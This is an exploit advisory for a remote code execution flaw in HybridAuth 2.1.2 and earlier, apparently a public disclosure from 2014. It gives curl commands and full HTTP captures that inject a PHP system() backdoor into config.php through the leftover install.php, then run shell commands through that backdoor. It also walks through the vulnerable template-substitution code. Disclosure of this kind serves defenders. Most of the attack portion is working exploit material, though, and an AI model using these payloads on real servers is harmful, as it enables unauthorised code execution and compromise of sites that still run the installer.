HybridAuth Installer

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # HybridAuth <= 2.1.2 Remote Code Execution # Website : http://hybridauth.sourceforge.net/ # Exploit Author : @u0x (Pichaya Morimoto) # Release dates : August 5, 2014 # # Special Thanks to 2600 Thailand group # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ HybridAuth enable developers to easily build social applications to engage websites vistors and customers on a social level by implementing social signin, social sharing, users profiles, friends list, activities stream, status updates and more. [+] Exploit ============================================================ The default installation leave "install.php" untouched. $ curl http://victim/hybridauth/install.php -d 'GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/*' $ curl http://victim/hybridauth/config.php -d '0=id;ls -lha' [+] Proof-of-Concept ============================================================ PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 Download : http://sourceforge.net/projects/hybridauth/files/hybridauth-2.1.2.zip/download 1. Inject Evil PHP Backdoor POST /hybridauth/install.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 51 GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/* HTTP/1.1 200 OK Date: Mon, 04 Aug 2014 18:53:36 GMT Server: Apache X-Powered-By: PHP/5.5.9-1ubuntu4.3 Vary: Accept-Encoding X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 2437 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html HybridAuth Installer ... 2. Gaining access to the PHP backdoor POST /hybridauth/config.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 14 0=id;ls%20-lha HTTP/1.1 200 OK Date: Mon, 04 Aug 2014 18:54:56 GMT Server: Apache X-Powered-By: PHP/5.5.9-1ubuntu4.3 Vary: Accept-Encoding X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 403 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html uid=33(www-data) gid=33(www-data) groups=33(www-data) total 40K drwxrwxr-x 3 longcat longcat 4.0K Feb 15 2013 . drwxr-xr-x 4 longcat www-data 4.0K Aug 5 01:14 .. drwxrwxr-x 5 longcat longcat 4.0K Feb 15 2013 Hybrid - -rw-rw-r-- 1 www-data www-data 2.5K Aug 5 01:53 config.php - -rw-rw-r-- 1 longcat longcat 488 Feb 15 2013 index.php - -rw-rw-r-- 1 longcat longcat 18K Feb 16 2013 install.php [+] Vulnerability Analysis ============================================================ Filename: ./install.php ... if( count( $_POST ) ): <-- user controlled input HTTP POST data \/-- Read a template file $CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.tpl" ); foreach( $_POST AS $k => $v ): $v = strip_tags( $v ); $z = "#$k#"; \/-- #POST data's keys# found in template file will be replaced with POST data's values | so we can simply replace these existing values with something fun :) $CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE ); endforeach; ... \/-- upload that replaced template contents into config.php $is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE . "config.php", $CONFIG_TEMPLATE ); ... Filename: ./Hybrid/resources/config.php.tpl ... return array( "base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#", <-- #..# will be replaced with arbitrary PHP code ... So this is what injected "config.php" looks like... Filename: ./config.php "".system($_POST[0]));/*", "providers" => array ( // openid providers "OpenID" => array ( "enabled" => #OPENID_ADAPTER_STATUS# ), ... Happy Pwning ;) LongCat -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJT39trAAoJEB2kHapd1XMUvFcP/je2VBLG4wDR1W2HIYCVmFOw 7WCYw+bWwDlf3rJsOJd/gQXIGIdgfGXP5nKE6nbvQ6N5a3ucHgArcjonP4kcMzTi wNgx01wdz0YkuZOoWqMz76VWjhNt+jfLm2rG2ihro8P1wvAX8/UOlOhmWXA0loeV pqoFeXvA5cC3lKQ8qnZiTlNepIDvoCbfo7EDpFWv+lCh23GoZsawdZ4MOg/l/D/Y qfCCGtcyaYC2qQAHTqaim0zLF6jUEto0+Y3+3Lxi3G9JdCYGWGWrX83L5ziVIEJI ANvaJEZF+JMzzS/RHufSMngld9IXGvDv/ZVMgn0ONH3bk2o9I19Nb/HT2DKnRSCh 1pIXWdQwnDuAM8z7ZhDakTusWlR2RiPM6YuPLUnyJHlx4PH2BnLlwVKZlNbcl97A 9qnbrUTmlivJx+Bh6HjU6TS5AN3ETVEngEG/vEkCmbEWvJyMpXppSq6a/gejDNx7 N57fqw+Vz/cWQVk7BaHK9KYQ3SnEJwdDFkCctlv13Ckd2UuOfAi1qwfZ7n6S0JgD oVO64SpYkeodOSJ59YX9vNn/gSYLjayNKINHWhJvtVXanYHrJzZY9Orjzf5pAl3+ WOGYjuf4pPJY2XNjAE4AQ68g2Csl3cqLdbHe1yRVrPmzK1ZMQC/tjcgiB6XZObxe kAPY+EmH3MxZ/qeob16k =10bM -----END PGP SIGNATURE-----